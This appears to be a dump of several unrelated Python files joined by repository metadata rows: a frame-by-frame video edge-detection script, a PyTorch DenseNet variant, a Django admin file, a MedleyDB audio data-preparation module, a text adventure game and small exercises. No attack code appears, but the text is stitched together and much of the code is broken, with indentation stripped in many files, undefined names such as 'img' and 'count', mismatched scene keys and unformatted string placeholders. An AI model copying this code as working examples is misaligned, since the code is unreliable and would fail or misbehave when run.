from canny_edge import *
import threading
from os.path import isfile, join
# Function for converting an image to grayscale
def rgb2gray(rgb):
return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])
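# The weights above are the ITU-R BT.601 luma coefficients, so e.g. a pure
# red pixel [255, 0, 0] maps to 0.299 * 255 = 76.245 in grayscale.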
# Export of video
def exportVid():
frame_array = []
files = [f for f in os.listdir('data/') if isfile(join('data/', f))]
files.sort(key = lambda x: int(x[5:-4]))
for i in range(len(files)):
filename = 'data/' + files[i]
img = cv2.imread(filename)
height, width, _ = img.shape
size = (width,height)
print(filename)
frame_array.append(img)
fourcc = cv2.VideoWriter_fourcc(*'DIVX')
out = cv2.VideoWriter('export.avi', fourcc, 24.0, (width,height))
for i in range(len(frame_array)):
out.write(frame_array[i])
out.release()
def thread(i, imgs):
    # start one edge-detection worker per frame in the batch, then wait for
    # all of them; frames are numbered i + 1 .. i + len(imgs)
    threads = []
    for offset, img in enumerate(imgs):
        t = threading.Thread(target=detect, args=(img, i + offset + 1))
        t.start()
        threads.append(t)
    for t in threads:
        t.join()
# Loading the video into python
cap = cv2.VideoCapture('bunny.mp4')
# Making a folder for the edited frames
try:
if not os.path.exists('data'):
os.makedirs('data')
except OSError:
print ('Error: Creating directory of data')
currentFrame = 0
imgs = []
height = 0
width = 0
n = 0
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
if not ret:
if(len(imgs) != 0):
for i in range(len(imgs)):
detect(img[i], currentFrame)
break
# Converting the frame to grayscale and adding it to a list
name = './data/frame' + str(currentFrame) + '.jpg'
print ('Slicing and converting to grayscale...' + name)
imgs.append(rgb2gray(frame))
    if len(imgs) == 60:
        # dispatch a full batch; with base index currentFrame - 59 the
        # workers label these frames currentFrame - 58 .. currentFrame + 1
        thread(currentFrame - 59, imgs)
        imgs = []
# Find height and width
height, width, _ = frame.shape
currentFrame += 1
image_folder = 'data'
images = [img for img in os.listdir(image_folder) if img.endswith(".jpg")]
frame = cv2.imread(os.path.join(image_folder, images[0]))
height, width, _ = frame.shape
exportVid()
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows() | [
"[email protected]"
] | |
8bfa5c02a3089abb03156a6609bfed1a989474e9 | d5f8ca3c13f681d147b7614f1902df7ba34e06f9 | /Graduate/model/densenet.py | 38359413ab29892a7c8f412c5fc1741039a65696 | [] | no_license | hhjung1202/OwnAdaptation | 29a6c0a603ab9233baf293096fb9e7e956647a10 | 50805730254419f090f4854387be79648a01fbb4 | refs/heads/master | 2021-06-25T22:31:15.437642 | 2020-11-26T18:19:55 | 2020-11-26T18:19:55 | 176,670,379 | 1 | 0 | null | 2020-06-11T07:35:55 | 2019-03-20T06:36:19 | Python | UTF-8 | Python | false | false | 7,429 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from torch import Tensor
import itertools
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.size(0), -1)
class _Gate_selection(nn.Sequential):
phase = 2
def __init__(self, num_input_features, growth_rate, count, reduction=4):
super(_Gate_selection, self).__init__()
self.actual = (count+1) // 2
LongTensor = torch.cuda.LongTensor if torch.cuda.is_available() else torch.LongTensor
self.init = LongTensor([i for i in range(num_input_features)]).view(1, -1)
s = num_input_features
arr = []
for j in range(count):
arr += [[i for i in range(s, s + growth_rate)]]
s+=growth_rate
self.arr = LongTensor(arr)
self.avg_pool = nn.AdaptiveAvgPool2d(1)
channels = num_input_features + growth_rate * count
self.fc1 = nn.Linear(channels, channels//reduction)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.Linear(channels//reduction, count)
self.sigmoid = nn.Sigmoid()
self.flat = Flatten()
def forward(self, x, x_norm):
b, _, w, h = x_norm.size()
out = self.avg_pool(x_norm) # batch, channel 합친거, w, h
out = self.flat(out)
out = self.relu(self.fc1(out))
out = self.sigmoid(self.fc2(out))
_, sort = out.sort()
indices = sort[:,:self.actual] # batch, sort # shuffle
indices = indices[:, torch.randperm(indices.size(1))]
select = self.init.repeat(b,1)
select = torch.cat([select, self.arr[indices].view(b,-1)], 1)
select = select.view(select.size(0), -1, 1, 1).repeat(1,1,w,h)
x = x.gather(1, select)
return x
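# Shape sketch under assumed values: with num_input_features=24,
# growth_rate=12 and count=3, actual = (3 + 1) // 2 = 2, so the gate keeps
# the 24 original channels plus 2 randomly ordered groups of 12 selected
# channels and returns a tensor of 24 + 2 * 12 = 48 channels.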
class _Bottleneck(nn.Sequential):
def __init__(self, num_input_features, growth_rate, count=1):
super(_Bottleneck, self).__init__()
self.norm1 = nn.BatchNorm2d(num_input_features)
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Conv2d(num_input_features, 4 * growth_rate,
kernel_size=1, stride=1, bias=False)
self.norm2 = nn.BatchNorm2d(4 * growth_rate)
self.conv2 = nn.Conv2d(4 * growth_rate, growth_rate,
kernel_size=3, stride=1, padding=1, bias=False)
self.count = count
def forward(self, x):
if isinstance(x, Tensor):
x = [x]
out = torch.cat(x,1)
out = self.norm1(out)
out = self.relu(out)
out = self.conv1(out)
out = self.norm2(out)
out = self.relu(out)
out = self.conv2(out)
return out
class _Basic(nn.Sequential):
def __init__(self, num_input_features, growth_rate):
super(_Basic, self).__init__()
self.norm1 = nn.BatchNorm2d(num_input_features)
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Conv2d(num_input_features, growth_rate,
kernel_size=3, stride=1, padding=1, bias=False)
self.count = count
def forward(self, x):
if isinstance(x, Tensor):
x = [x]
out = torch.cat(x,1)
out = self.norm1(out)
out = self.relu(out)
out = self.conv1(out)
return out
class _DenseLayer(nn.Module):
def __init__(self, num_input_features, growth_rate, num_layers, Block):
super(_DenseLayer, self).__init__()
self.num_layers = num_layers
self.init_block = Block(num_input_features, growth_rate)
for i in range(1, num_layers):
j = (i-1)//2 + 1
setattr(self, 'layer{}'.format(i), Block(num_input_features + growth_rate * j, growth_rate))
setattr(self, 'norm{}'.format(i), nn.BatchNorm2d(num_input_features + growth_rate * (i+1)))
setattr(self, 'gate{}'.format(i), _Gate_selection(num_input_features, growth_rate, i+1, reduction=4))
def forward(self, x):
out = self.init_block(x)
x = [x] + [out]
out = torch.cat(x,1)
for i in range(1, self.num_layers):
out = getattr(self, 'layer{}'.format(i))(out)
x += [out]
x_cat = torch.cat(x,1)
x_norm = getattr(self, 'norm{}'.format(i))(x_cat)
out = getattr(self, 'gate{}'.format(i))(x_cat, x_norm)
return x_cat
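# Channel bookkeeping for the loop above: block i consumes
# num_input_features + growth_rate * ((i - 1) // 2 + 1) channels because the
# gate of the previous step kept only about half of the accumulated block
# outputs, while x_cat (what forward() returns) keeps all
# num_input_features + growth_rate * num_layers channels for the transition.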
class _Transition(nn.Sequential):
def __init__(self, num_input_features, tr_features):
super(_Transition, self).__init__()
self.norm = nn.BatchNorm2d(tr_features)
self.relu = nn.ReLU(inplace=True)
self.conv = nn.Conv2d(tr_features, num_input_features // 2,
kernel_size=1, stride=1, bias=False)
self.pool = nn.AvgPool2d(kernel_size=2, stride=2)
def forward(self, x):
# out = torch.cat(x,1)
out = self.norm(x)
out = self.relu(out)
out = self.conv(out)
out = self.pool(out)
return out
class DenseNet(nn.Module):
def __init__(self, growth_rate=12,
num_init_features=24, num_classes=10, is_bottleneck=True, layer=28):
super(DenseNet, self).__init__()
        if layer == 28:
            block_config = [4, 4, 4]
        elif layer == 40:
            block_config = [6, 6, 6]
        elif layer == 52:
            block_config = [8, 8, 8]
        elif layer == 64:
            block_config = [10, 10, 10]
if is_bottleneck:
Block = _Bottleneck
else:
Block = _Basic
block_config = [2*x for x in block_config]
self.features = nn.Sequential()
self.features.add_module('conv0', nn.Conv2d(3, num_init_features, kernel_size=3, stride=1, padding=1, bias=False))
num_features = num_init_features
for i in range(len(block_config)):
self.features.add_module('layer%d' % (i + 1), _DenseLayer(num_features, growth_rate, block_config[i], Block))
tr_features = num_features + block_config[i] * growth_rate
num_features = num_features + block_config[i] * growth_rate // 2
if i != len(block_config) - 1:
self.features.add_module('transition%d' % (i + 1), _Transition(num_features, tr_features))
num_features = num_features // 2
# Final batch norm
self.norm = nn.BatchNorm2d(tr_features)
self.relu = nn.ReLU(inplace=True)
self.pool = nn.AvgPool2d(kernel_size=8, stride=1)
self.fc = nn.Linear(tr_features, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.constant_(m.bias, 0)
# Linear layer
# Official init from torch repo.
def forward(self, x):
out = self.features(x)
# out = torch.cat(out,1)
out = self.norm(out)
out = self.relu(out)
out = self.pool(out)
out = out.view(out.size(0), -1)
out = self.fc(out)
return out
if __name__=='__main__':
x = torch.randn(4,3,32,32)
model = DenseNet(growth_rate=12, num_init_features=24, num_classes=10, is_bottleneck=True, layer=40)
y = model(x)
print(y.size()) | [
"[email protected]"
] | |
353d23ee1d8f260fdba75771dad1edcc93f3b402 | f09f92fb6d46d75ce92d3e1183adc68b8087a56e | /sandbox.py | b4af84ff90854b543f72b9ef82e6a7468f1b214b | [] | no_license | nikitafainberg/darkWorldAuth | d7f79ebb04ec0279c3b4b69a25e746d445a4ed19 | 24547eda0622fe15a1b3cfed674f2660623c2a0d | refs/heads/master | 2023-08-29T11:04:35.954817 | 2021-11-13T23:26:04 | 2021-11-13T23:26:04 | 427,531,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | from DB_manger import dbConnector
if __name__ == '__main__':
db_connector = dbConnector()
users = db_connector.get_user_by_username("nick")[0]
print(users)
| [
"[email protected]"
] | |
4cb3844e79b7b04d524f902a1436ea166712750d | 7bc1d2a995ce6488c7dd20909a6f9443d6d8ced8 | /admin.py | f9970ac554b7883eb5ab7ee1f153581bbdd2be7d | [] | no_license | strategy2231/django_learn | dd4f7d1bd77157b893a8ea2d8355e980898687f5 | 9b9544c24d42892acef53943eb707bc5b8ca48c3 | refs/heads/master | 2021-01-12T16:01:43.756219 | 2016-10-25T18:45:48 | 2016-10-25T18:45:48 | 71,918,737 | 0 | 0 | null | 2016-10-25T18:40:31 | 2016-10-25T16:50:45 | Python | UTF-8 | Python | false | false | 612 | py |
# Register your models here.
from django.contrib import admin
from restaurants.models import Restaurant, Food,Comment
class RestaurantAdmin(admin.ModelAdmin):
list_display = ('name', 'phone_number', 'address','date')
search_fields = ('name',)
class FoodAdmin(admin.ModelAdmin):
list_display = ('name', 'restaurant', 'price','is_spicy','comment','date')
list_filter = ('is_spicy',)
#fields = ('price','restaurant')
search_fields = ('name',)
ordering = ('-price',)
admin.site.register(Restaurant,RestaurantAdmin)
admin.site.register(Food,FoodAdmin)
admin.site.register(Comment) | [
"[email protected]"
] | |
da39ff189fd2c0d2ba922949117085f9ce98e2fa | 85be450530138c8b66c513c4283bcb1d58caeeb0 | /apps/funcionarios/migrations/0005_funcionario_imagem.py | bc149c39e59bf25051a7e604642ca132a0e9a4c1 | [] | no_license | fgomesc/gestao_teste | 6be81a263fddb1b1e5d6a2d768387fc024e9bdc3 | b2890ffa99361dd30b002706c94d1e5299651315 | refs/heads/master | 2021-09-25T06:21:51.602878 | 2021-09-14T18:27:13 | 2021-09-14T18:27:13 | 236,030,673 | 0 | 0 | null | 2021-06-10T22:31:09 | 2020-01-24T15:42:59 | JavaScript | UTF-8 | Python | false | false | 446 | py | # Generated by Django 2.1.1 on 2018-11-17 12:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('funcionarios', '0004_auto_20181029_2313'),
]
operations = [
migrations.AddField(
model_name='funcionario',
name='imagem',
field=models.ImageField(default=1, upload_to='fotos'),
preserve_default=False,
),
]
| [
"[email protected]"
] | |
38ed67962462a2b1c17e8f0180e3df363f2c1773 | fb3630fa338b304cd951b94375faf6c55a94488e | /msu_map/raw/images/convertPNG.py | bc9ca24e740c4e7995f1d2b56842e474db3cf325 | [] | no_license | Outtascope/MSUPaths_iPhone | 9001fccceccfed791a3d41846eb47424d847890e | 062f20860e949bea72872d912da046774ce6e0a8 | refs/heads/master | 2020-12-07T15:32:38.461826 | 2015-06-18T02:27:02 | 2015-06-18T02:27:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | from PIL import Image
from glob import glob
for imgFile in glob("./*.png"):
try:
img = Image.open(imgFile)
img.save(imgFile,"PNG")
except IOError, msg:
print "Fail at: ", imgFile, " :", msg
| [
"[email protected]"
] | |
53a4aee6671f14f354522c8971d2917b12424013 | acb5c517f02a6643e276b9c3ddf1a23bf15afc29 | /src/data/data_prep.py | a55851f23be96405cce7041f8149f90d14511382 | [] | no_license | razvannica/instrument-recognition | 13018ec6b403765dc452b9c961c9222967f041ee | a94866b67cc9646ed4633b761dd3440e14ec5f93 | refs/heads/master | 2020-03-20T07:06:47.404105 | 2018-06-13T22:02:58 | 2018-06-13T22:02:58 | 137,271,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,306 | py | import numpy as np
import os
import cPickle
import pandas as pd
import yaml
import wave
import struct
import gc
from scipy.io import wavfile
from scipy.io import savemat
import copy
import patch_label
"""
This file contains all scripts necessary for preparing data.
The code in this file reads all wav files, metadata and annotations for mixed
tracks. And then it takes patches of x seconds each from each track and labels
them.
Finally the resulting raw data is saved to several mat files, each containing
y tracks.
WARNING: If save_size is set to 20 in prep_data(), it takes 2 to 10 min to
read data for one mat file, 3GB memory to keep program running, and
1.5GB disk storage to save one mat file.
If you find yourself out of memory, set save_size to a lower value.
Still looking for more efficient ways to store data.
Need discussion: too many kinds of instruments (over 80) if all are used
"""
def backup_wavfile_reader(fpath):
"""Read wav files when scipy wavfile fail to read.
Args:
fpath (str): path to the wav file to read
Returns:
numpy array: data read from wav file
"""
f = wave.open(fpath, 'rb')
res = []
for i in xrange(f.getnframes()):
frame = f.readframes(1)
x = struct.unpack('=h', frame[:2])[0]
y = struct.unpack('=h', frame[2:])[0]
res.append([x, y])
return np.array(res)
def read_mixed_from_files(dpath, dlist, pickle_file=None):
"""Read the mixed track files and return as dictionary
Args:
dpath (str): path to the directory "MedleyDB/Audio"
dlist (list): list of str, each for one mixed track file
Returns:
dict: in the format of {song_name(string): song_data(numpy array)}
song_data two rows n cols. Each row is a channel, each col is a
time frame.
"""
res = dict()
for i in dlist:
fpath = os.path.join(dpath, i, '{}_MIX.wav'.format(i))
try:
data = wavfile.read(fpath)[1].T
except:
print "Warning: can't read {}, switch to backup reader". \
format(fpath)
data = backup_wavfile_reader(fpath).T
res[i] = np.float32(data)
if pickle_file is not None:
with open(pickle_file, 'w') as f:
cPickle.dump(res, f)
return res
def normalize_data(data):
"""Normalize data with respect to each file in place
    For each file, standardize each channel (row) using its own mean and std
Args:
data (dict): in format of {song_name(string): song_data(numpy array)}
Returns:
N/A
"""
for k in data.keys():
mean = data[k].mean(axis=1).reshape(2, 1)
std = data[k].std(axis=1).reshape(2, 1)
data[k] = np.float32(((data[k] - mean) / std))
def read_activation_confs(path, pickle_file=None):
"""Read the annotation files of activation confidence, return as dictionary
Args:
path (string): path to the directory "MedleyDB"
Returns:
dict: in the format of {song_name(string): annotation(pandas df)}
"""
dpath = os.path.join(path, 'Annotations', 'Instrument_Activations',
'ACTIVATION_CONF')
dlist = os.listdir(dpath)
res = dict()
for i in dlist:
fpath = os.path.join(dpath, i)
annotation = pd.read_csv(fpath, index_col=False)
k = i[:-20].split('(')[0]
k = k.translate(None, "'-")
res[k] = annotation
if pickle_file is not None:
with open(pickle_file, 'w') as f:
cPickle.dump(res, f)
return res
def read_meta_data(path, pickle_file=None):
"""Read the metadata for instrument info, return as dictionary
Args:
path (string): path to the directory "MedleyDB"
Returns:
dict: in the format of {song_name(string): instrument_map(dict)}
instrument_map is of the format eg: {'S01': 'piano'}
"""
dpath = os.path.join(path, "Audio")
dlist = os.listdir(dpath)
res = dict()
for i in dlist:
fpath = os.path.join(dpath, i, '{}_METADATA.yaml'.format(i))
with open(fpath, 'r') as f:
meta = yaml.load(f)
instrument = {k: v['instrument'] for k, v in meta['stems'].items()}
res[i] = instrument
if pickle_file is not None:
with open(pickle_file, 'w') as f:
cPickle.dump(res, f)
return res
def groupMetaData(meta, instGroup):
"""Match instrument number in annotation with real instrument name in meta.
Args:
meta (dict): in the format of {song_name(string): instrument_map(dict)}
instrument_map is of the format eg: {'S01': 'piano'}
instGroup (dict): {instrument: instrumentGroup} eg: {'piano': 'struck'}
Returns:
groupedMeta (dict): in the format of
{song_name(string): instrument_map(dict)}
"""
groupedMeta = copy.deepcopy(meta)
for songName in groupedMeta.keys():
for stemName in groupedMeta[songName]:
groupedMeta[songName][stemName] = instGroup[groupedMeta[songName]
[stemName]]
return groupedMeta
def match_meta_annotation(meta, annotation):
"""Match instrument number in annotation with real instrument name in meta.
Note: In the annotation of one mixed track, there can be multiple instances
of the same instrument, in which case the same column name appears
multiple times in the pandas df
Args:
meta (dict): in the format of {song_name(string): instrument_map(dict)}
instrument_map is of the format eg: {'S01': 'piano'}
annotation (dict): {song_name(string): annotation(pandas df)}
Returns:
        list: containing all instruments involved, sorted in alphabetic order
"""
assert(len(meta) == len(annotation))
all_instruments = set()
for k, v in annotation.items():
v.rename(columns=meta[k], inplace=True)
all_instruments.update(v.columns[1:])
return sorted(list(all_instruments))
def split_music_to_patches(data, annotation, inst_map, label_aggr, length=1,
sr=44100, time_window=100.0, binary=False,
threshold=None):
"""Split each music file into (length) second patches and label each patch
Note: for each music file, the last patch that is not long enough is
abandoned.
And each patch is raveled to have only one row.
Args:
data(dict): the raw input data for each music file
annotation(dict): annotation for each music file
calculated as average confidence in this time period
        inst_map(dict): a dictionary that maps an instrument name to its correct
position in the sorted list of all instruments
label_aggr(function): a function that defines the way labels for each
sample chunk is generated, default is np.mean
length(int): length of each patch, in seconds
sr (int): sample rate of raw audio
time_window(float): time windows for average (in milliseconds)
Returns:
dict: {'X': np array for X, 'y': np array for y, 'present': np array
of indicators for whether the instrument is present in the
track from which the patch is taken}
"""
res = []
patch_size = sr * length
for k, v in data.items():
for i, e in enumerate(xrange(0, v.shape[1] - patch_size, patch_size)):
patch = v[:, e:patch_size+e].ravel()
sub_df = annotation[k][(i * length <= annotation[k].time) &
(annotation[k].time < (i + 1) * length)]
if label_aggr is not None:
inst_conf = sub_df.apply(label_aggr, 0).drop('time')
else:
inst_conf = patch_label.patch_label(0, length, time_window,
sub_df, binary,
threshold).iloc[0]
label = np.zeros(len(inst_map), dtype='float32')
is_present = np.zeros(len(inst_map), dtype='float32')
for j in inst_conf.index:
temp = inst_conf[j]
# if there are two columns of the same instrument, take maximum
if isinstance(temp, pd.Series):
temp = temp.max()
label[inst_map[j]] = temp
is_present[inst_map[j]] = 1.0
res.append((patch, label, is_present, k, (i*length, (i+1)*length)))
X, y, present, song_name, time = zip(*res)
return {'X': np.array(X), 'y': np.array(y), 'present': np.array(present),
'song_name': song_name, 'time': np.array(time, dtype='float32')}
def prep_data(in_path, out_path=os.curdir, save_size=20, norm_channel=False,
label_aggr=None, start_from=0, groupID='Group 4', **kwargs):
"""Prepare data for preprocessing
Args:
in_path(str): the path for "MedleyDB"
out_path(str): the path to save pkl files, default to be current
save_size(int): the number of wav files contained in each mat
file. Large save_size requires large memory
        norm_channel(bool): whether to normalize each channel locally
label_aggr(function): a function that defines the way labels for each
sample chunk is generated, default is np.mean
        start_from(int): the index of the file, in alphabetic order, to start reading
from. All files before that are ignored. Used to
continue from the file last read.
kwargs (dict): additional arguments to pass to split_music_to_patches
Returns:
N/A
"""
# save parameters for this run
to_write = ['{} = {}'.format(k, v) for k, v in locals().items()]
with open(os.path.join(out_path, 'config.txt'), 'wb') as f:
f.write('\n'.join(to_write))
# read annotations and match with metadata
anno_pkl = os.path.join(out_path, 'anno_label.pkl')
annotation = read_activation_confs(in_path)
meta = read_meta_data(in_path)
# group instruments in metadata
instGrouping = pd.read_csv('./instGroup.csv')
groupLookup = dict(zip(instGrouping['Instrument'].values,
instGrouping[groupID].values))
meta = groupMetaData(meta, groupLookup)
all_instruments = match_meta_annotation(meta, annotation)
if not os.path.exists(anno_pkl):
with open(anno_pkl, 'w') as f:
cPickle.dump(annotation, f)
# create and save song_instr mapping
song_instr = {}
for k, v in annotation.items():
song_instr[k] = set(v.columns[1:])
with open(os.path.join(out_path, 'song_instr.pkl'), 'wb') as f:
cPickle.dump(song_instr, f)
# save all instrument list to file
with open('all_instruments.txt', 'wb') as f:
f.write('\n'.join(all_instruments))
# get a dictionary mapping all instrument to sorted order
all_instruments_map = {e: i for i, e in enumerate(all_instruments)}
print 'Total number of labels = {}'.format(len(all_instruments))
# read mixed tracks
dpath = os.path.join(in_path, "Audio")
dlist = sorted(os.listdir(dpath)) # get list of tracks in sorted order
# write the list to file as reference for song_names in data
with open(os.path.join(out_path, 'song_name_list.txt'), 'wb') as f:
f.write('\n'.join(dlist))
# get a mapping of song names to their sorted order
song_name_map = {e: i for i, e in enumerate(dlist)}
for i in range(max(start_from, 0), len(dlist), save_size):
tdlist = dlist[i:i+save_size]
data = read_mixed_from_files(dpath, tdlist)
print 'finished reading file'
if norm_channel:
normalize_data(data)
print 'finished normalizing data'
# split to x second patches
for k, v in data.items():
patched_data = split_music_to_patches({k: v}, annotation,
all_instruments_map,
label_aggr, **kwargs)
temp_l = len(patched_data['song_name'])
patched_data['song_name'] = np.array([song_name_map[e] for e in
patched_data['song_name']],
dtype='float32'). \
reshape(temp_l, 1)
# save patches to file
patches_save_path = os.path.join(out_path, '{}_patched.mat'.
format(k))
if not os.path.exists(patches_save_path):
savemat(patches_save_path, patched_data)
del patched_data
print 'finished taking patches of {}'.format(k)
del data
gc.collect()
print 'finished {} of {}'.format(min(i+save_size, len(dlist)),
len(dlist))
def main():
root = os.path.abspath(os.sep)
in_path = os.path.join(root, 'Volumes', 'VOL2', 'MedleyDB')
prep_data(in_path, length=1, time_window=100.0, binary=False,
threshold=None)
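if __name__ == '__main__':
    # Guard added so importing this module does not trigger a full data run;
    # main() simply calls prep_data() with the hard-coded local path above.
    main()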
| [
"[email protected]"
] | |
045e3b79ee98a308915d4259f3453d80f710f82a | 2fdc236b11ad16052ceab7f566657fca41f1f45e | /ex43.py | 6a274bbbb087040ef06becf94b2fcb75158b37d6 | [] | no_license | HeshamBahgat/Learn-Python-The-Hard-Way | 6bc155e18efaf24cdf90a591149b8e97b3926337 | 67a6d1320eb9964f6db0cf435b1f319cb14c7a3b | refs/heads/master | 2020-06-03T01:05:11.992987 | 2019-06-11T13:27:34 | 2019-06-11T13:27:34 | 191,370,913 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,711 | py | from sys import exit
from random import randint
from textwrap import dedent
## adventure game
class Scene(object):
def enter(self):
print("This scene is not yet configured")
print("Subclass it and implement enter().")
exit(1)
class Engine(object):
def __init__(self, scene_map):
self.scene_map = scene_map
def play(self):
current_scene = self.scene_map.opening_scene()
last_scene = self.scene_map.next_scene("finished")
while current_scene != last_scene:
next_scene_name = current_scene.enter()
current_scene = self.scene_map.next_scene(next_scene_name)
# be sure to print out the last scene
current_scene.enter()
class Death(Scene):
quips = [
"You died. You kinda suck at this.",
"Your Mom would be pround...if she were smarter."
"Such a luser."
"I have a small puppy that's better st this."
"You're worse than your Dad's jokes."]
def enter(self):
print(Death.quips[randint(0, len(self.quips)-1)])
exit(1)
class CentralCorridor(Scene):
def enter(self):
print(dedent('''
The Gothons of planet percal #25 have invaded your ship and destroyed your entire crew.
You are the last surviving member and your last mission is to get the neutron destruct bomb from the weapon Armory,
put it in the bridge, and blow the shio up after getting into an escape pod
You're running down the central corridor to the weapons Armory when a Gothon jumps out.
red scaly skin, dark grimy teeth, and evil clown costume flowing around his hate filled body. He's blocking the door to the Armory
and about to pull a weapon to blast you'''))
action = input("> ")
if action == "shoot!":
print(dedent("""
Quick on the draw you yank out your blaster and fire
it at the Gothon. His clown costume is flowing and
moving around his body, which throws off your aim.
Your laser hits his costume but misses him entirely.
This completely ruins his brand new costume his mother
bought him, which makes him fly into an insane rage
and blast you repeatedly in the face until you are
dead. Then he eats you.
"""))
return "Death"
elif action == "tell a joke":
print(dedent("""
Lucky for you they made you learn Gothon insults in
the academy. You tell the one Gothon joke you know:
Lbhe zbgure vf fb sng, jura fur fvgf nebhaq gur ubhfr,
fur fvgf nebhaq gur ubhfr. The Gothon stops, tries
not to laugh, then busts out laughing and can't move.
While he's laughing you run up and shoot him square in
the head putting him down, then jump through the
Weapon Armory door.
"""))
return 'laser_weapon_armory'
else:
print("Does NOT Compute!")
return "central_corridor"
class LaserWeaponArmory(Scene):
def enter(self):
print(dedent("""
You do a dive roll into the Weapon Armory, crouch and scan
the room for more Gothons that might be hiding. It's dead
quiet, too quiet. You stand up and run to the far side of
the room and find the neutron bomb in its container.
There's a keypad lock on the box and you need the code to
get the bomb out. If you get the code wrong 10 times then
the lock closes forever and you can't get the bomb. The
code is 3 digits.
"""))
code = f"{randint(1,9)}{randint(1,9)}{randint(1,9)}"
        print(code)  # debug aid: reveals the keypad code
guess = input("[keypad> ]")
guesses = 0
while guess != code and guesses < 10:
print("BZZZZEDDD")
guesses += 1
guess = input("[keypad> ]")
if guess == code:
print(dedent("""
The container clicks open and the seal breaks, letting
gas out. You grab the neutron bomb and run as fast as
you can to the bridge where you must place it in the
right spot.
"""))
return 'the_bridge'
else:
print(dedent("""
The lock buzzes one last time and then you hear a
sickening melting sound as the mechanism is fused
together. You decide to sit there, and finally the
Gothons blow up the ship from their ship and you die.
"""))
return 'death'
class TheBridge(Scene):
def enter(self):
print(dedent("""
You burst onto the Bridge with the netron destruct bomb
under your arm and surprise 5 Gothons who are trying to
take control of the ship. Each of them has an even uglier
clown costume than the last. They haven't pulled their
weapons out yet, as they see the active bomb under your
arm and don't want to set it off.
"""))
action = input("> ")
if action == "throw the bomb":
print(dedent("""
In a panic you throw the bomb at the group of Gothons
and make a leap for the door. Right as you drop it a
Gothon shoots you right in the back killing you. As
you die you see another Gothon frantically try to
disarm the bomb. You die knowing they will probably
blow up when it goes off.
"""))
return 'death'
elif action == "slowly place the bomb":
print(dedent("""
You point your blaster at the bomb under your arm and
the Gothons put their hands up and start to sweat.
You inch backward to the door, open it, and then
carefully place the bomb on the floor, pointing your
blaster at it. You then jump back through the door,
punch the close button and blast the lock so the
Gothons can't get out. Now that the bomb is placed
you run to the escape pod to get off this tin can.
"""))
return 'escape_pod'
else:
print("DOES NOT COMPUTE!")
return "the_bridge"
class EscapePod(Scene):
    def enter(self):
print(dedent("""
You rush through the ship desperately trying to make it to
the escape pod before the whole ship explodes. It seems
like hardly any Gothons are on the ship, so your run is
clear of interference. You get to the chamber with the
escape pods, and now need to pick one to take. Some of
them could be damaged but you don't have time to look.
There's 5 pods, which one do you take?
"""))
good_pod = randint(1, 5)
        print(good_pod)  # debug aid: reveals the good pod
guess = input("[pod #]> ")
if int(guess) != good_pod:
print(dedent("""
You jump into pod {guess} and hit the eject button.
The pod escapes out into the void of space, then
implodes as the hull ruptures, crushing your body into
jam jelly.
"""))
return 'death'
else:
print(dedent("""
You jump into pod {guess} and hit the eject button.
The pod easily slides out into space heading to the
planet below. As it flies to the planet, you look
back and see your ship implode then explode like a
bright star, taking out the Gothon ship at the same
time. You won!
"""))
return 'finished'
class Finished(Scene):
def enter(self):
print("You won! Good job")
return "Finished"
class Map(object):
scenes = {
'central_corridor': CentralCorridor(),
'laser_weapon_armory': LaserWeaponArmory(),
'the_bridge': TheBridge(),
'escape_pod': EscapePod(),
'death': Death(),
'finished': Finished(),
}
def __init__(self, start_scene):
self.start_scene = start_scene
def next_scene(self, scene_name):
        val = Map.scenes.get(scene_name)
        return val
def opening_scene(self):
return self.next_scene(self.start_scene)
a_map = Map('central_corridor')
a_game = Engine(a_map)
a_game.play()
"""
1- the Map class stores all scenes as a dict, and each scene has a key used to call the scene like a function
2- the Engine drives the Map: two variables are created, then scenes are called depending on these variables
3- these variables use methods from the Map class and the scenes dict
""" | [
"[email protected]"
] | |
eea33ae817b3fd5ed3cb9850e88cdc7f95ce66d3 | 2676b16638e5495fd85aa0ab1bb34a4869373015 | /exceptions.py | 0494599441bd3a56abae9eab930a1c58bf29a917 | [] | no_license | ryrysmiley/compsci230 | c9053f24fa3bec8ce84f92682b6a882c8e67c9fd | 0d4ece995d5c1b654dd230ada6a480198f4b926a | refs/heads/main | 2023-01-24T14:07:13.209862 | 2020-12-08T01:48:48 | 2020-12-08T01:48:48 | 315,526,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 779 | py | """
try:
f=open("test.txt")
print(f.read())
except FileNotFoundError:
print("File doesn't exist")
try:
x=int(input())
print(2/x)
except ValueError:
print("that is not an int")
except ZeroDivisionError:
print("can't divide by zero")
"""
user_input = ''
while user_input != "q":
try:
user_age=int(input("age"))
if user_age<=0:
raise ValueError("Invalid age")
print(user_age)
weight=int(input("weight"))
if weight<=0:
raise ValueError("Invalid weight")
print(weight)
height=int(input("height"))
if height<=0:
raise ValueError("Invalid height")
print(height)
except ValueError as e:
print(e)
user_input = input("q to quit")
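# A possible extension (sketch, not part of the original exercise): try/except
# also supports `else` (runs only when no exception was raised) and `finally`
# (always runs), e.g.:
#
#     try:
#         bmi = weight / (height / 100) ** 2
#     except ZeroDivisionError:
#         print("height cannot be zero")
#     else:
#         print(bmi)
#     finally:
#         print("done")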
| [
"[email protected]"
] | |
44f71b6be270f1b19df492c0580443c20b5fea64 | d5c659075525981f5683ebdabcebb6df6429efa4 | /lib/complement.py | c7cb5767abdc9130c5c173830f3a863683e1a778 | [
"MIT"
